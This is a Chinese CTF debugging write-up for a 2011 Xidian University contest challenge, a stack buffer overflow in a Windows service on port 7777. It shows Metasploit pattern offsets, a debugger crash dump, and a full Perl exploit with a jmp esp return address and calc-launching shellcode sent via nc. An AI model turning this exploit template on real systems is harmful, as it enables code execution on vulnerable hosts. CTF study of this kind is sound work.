运行服务端发现监听本地的 7777端口。

root@kali:~/Desktop#  /opt/metasploit/apps/pro/msf3/tools/pattern_create.rb 2000 > ~/Desktop/hi.txt
root@kali:~/Desktop# cat hi.txt |nc -vv 192.168.1.16 7777
192.168.1.16: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.1.16] 7777 (?) open
生成超长字符串 用nc提交

发先服务端挂起了 eip被改写为 37674136

Executable search path is:
ModLoad: 00400000 0040c000   C:/Documents and Settings/Administrator/桌面/xdcsc2011/xdcsc2011/shellcode溢出/第四题/exploit.exe
ModLoad: 7c920000 7c9b6000   C:/WINDOWS/system32/ntdll.dll
ModLoad: 7c800000 7c91d000   C:/WINDOWS/system32/kernel32.dll
ModLoad: 71a20000 71a37000   C:/WINDOWS/system32/WS2_32.dll
ModLoad: 77be0000 77c38000   C:/WINDOWS/system32/msvcrt.dll
ModLoad: 71a10000 71a18000   C:/WINDOWS/system32/WS2HELP.dll
ModLoad: 77da0000 77e49000   C:/WINDOWS/system32/ADVAPI32.dll
ModLoad: 77e50000 77ee2000   C:/WINDOWS/system32/RPCRT4.dll
ModLoad: 77fc0000 77fd1000   C:/WINDOWS/system32/Secur32.dll
ModLoad: 719c0000 719fe000   C:/WINDOWS/system32/mswsock.dll
ModLoad: 60fd0000 61025000   C:/WINDOWS/system32/hnetcfg.dll
ModLoad: 77ef0000 77f38000   C:/WINDOWS/system32/GDI32.dll
ModLoad: 77d10000 77d9f000   C:/WINDOWS/system32/USER32.dll
ModLoad: 76300000 7631d000   C:/WINDOWS/system32/IMM32.DLL
ModLoad: 62c20000 62c29000   C:/WINDOWS/system32/LPK.DLL
ModLoad: 73fa0000 7400b000   C:/WINDOWS/system32/USP10.dll
ModLoad: 71a00000 71a08000   C:/WINDOWS/System32/wshtcpip.dll
(f44.a68): Access violation – code c0000005 (!!! second chance !!!)
eax=00409a68 ebx=00000080 ecx=00410e20 edx=00000000 esi=00000200 edi=0012fdf4
eip=37674136 esp=0012fbbc ebp=00000064 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
37674136 ??              ???
0:000> d esp
0012fbbc  41 67 38 41 67 39 41 68-30 41 68 31 41 68 32 41  Ag8Ag9Ah0Ah1Ah2A
0012fbcc  68 33 41 68 34 41 68 35-41 68 36 41 68 37 41 68  h3Ah4Ah5Ah6Ah7Ah
0012fbdc  38 41 68 39 41 69 30 41-69 31 41 69 32 41 69 33  8Ah9Ai0Ai1Ai2Ai3
0012fbec  41 69 34 41 69 35 41 69-36 41 69 37 41 69 38 41  Ai4Ai5Ai6Ai7Ai8A
0012fbfc  69 39 41 6a 30 41 6a 31-41 6a 32 41 6a 33 41 6a  i9Aj0Aj1Aj2Aj3Aj
0012fc0c  34 41 6a 35 41 6a 36 41-6a 37 41 6a 38 41 6a 39  4Aj5Aj6Aj7Aj8Aj9
0012fc1c  41 6b 30 41 6b 31 41 6b-32 41 6b 33 41 6b 34 41  Ak0Ak1Ak2Ak3Ak4A
0012fc2c  6b 35 41 6b 36 41 6b 37-41 6b 38 41 6b 39 41 6c  k5Ak6Ak7Ak8Ak9Al
0:000>

定位下溢出点:

root@scan:~/Desktop# /opt/metasploit/apps/pro/msf3/tools/pattern_offset.rb 37674136
[*] Exact match at offset 200
root@scan:~/Desktop# /opt/metasploit/apps/pro/msf3/tools/pattern_offset.rb  Ag8A
[*] Exact match at offset 204
可以看到200字节以后的4字节覆盖返回地址,204字节以后的四字节覆盖了esp;

200字节 4字节                若干字节shellcode(esp)
[junk] [jmp esp address] [shellcode here]

#!/usr/bin/perl
# 2011西安电子科技大学网络攻防大赛  溢出题 第四题  exploit
# by c4rp3nt3r@0x50sec.org
#
my $junk = "A" x 200;
my $eip = pack('V',0x7ffa4512);    #jmp esp
# windows/exec - 196 bytes
# http://www.metasploit.com
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
# CMD=calc
my $payload =
"/x90/x90/x90/x90/x90/x90/x90" .
"/xd9/xc0/xbb/xcd/xf7/x9a/xa7/xd9/x74/x24/xf4/x5d/x31/xc9" .
"/xb1/x32/x31/x5d/x17/x03/x5d/x17/x83/x08/xf3/x78/x52/x6e" .
"/x14/xf5/x9d/x8e/xe5/x66/x17/x6b/xd4/xb4/x43/xf8/x45/x09" .
"/x07/xac/x65/xe2/x45/x44/xfd/x86/x41/x6b/xb6/x2d/xb4/x42" .
"/x47/x80/x78/x08/x8b/x82/x04/x52/xd8/x64/x34/x9d/x2d/x64" .
"/x71/xc3/xde/x34/x2a/x88/x4d/xa9/x5f/xcc/x4d/xc8/x8f/x5b" .
"/xed/xb2/xaa/x9b/x9a/x08/xb4/xcb/x33/x06/xfe/xf3/x38/x40" .
"/xdf/x02/xec/x92/x23/x4d/x99/x61/xd7/x4c/x4b/xb8/x18/x7f" .
"/xb3/x17/x27/xb0/x3e/x69/x6f/x76/xa1/x1c/x9b/x85/x5c/x27" .
"/x58/xf4/xba/xa2/x7d/x5e/x48/x14/xa6/x5f/x9d/xc3/x2d/x53" .
"/x6a/x87/x6a/x77/x6d/x44/x01/x83/xe6/x6b/xc6/x02/xbc/x4f" .
"/xc2/x4f/x66/xf1/x53/x35/xc9/x0e/x83/x91/xb6/xaa/xcf/x33" .
"/xa2/xcd/x8d/x59/x35/x5f/xa8/x24/x35/x5f/xb3/x06/x5e/x6e" .
"/x38/xc9/x19/x6f/xeb/xae/xd6/x25/xb6/x86/x7e/xe0/x22/x9b" .
"/xe2/x13/x99/xdf/x1a/x90/x28/x9f/xd8/x88/x58/x9a/xa5/x0e" .
"/xb0/xd6/xb6/xfa/xb6/x45/xb6/x2e/xd5/x08/x24/xb2/x1a";
print $junk.$eip.$payload."/r/n";

这道题目也太水了点吧~~~

 

发送exp之后看到了熟悉的calc

root@scan:~/Desktop# perl exp.pl |nc -vv 192.168.1.16 7777
192.168.1.16: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.1.16] 7777 (?) open
sent 436, rcvd 0

2011西电网络攻防大赛 shellcode溢出第四题 调试笔记

 

该文章由WP-AutoPost插件自动采集发布

原文地址:http://bluereader.org/article/23968077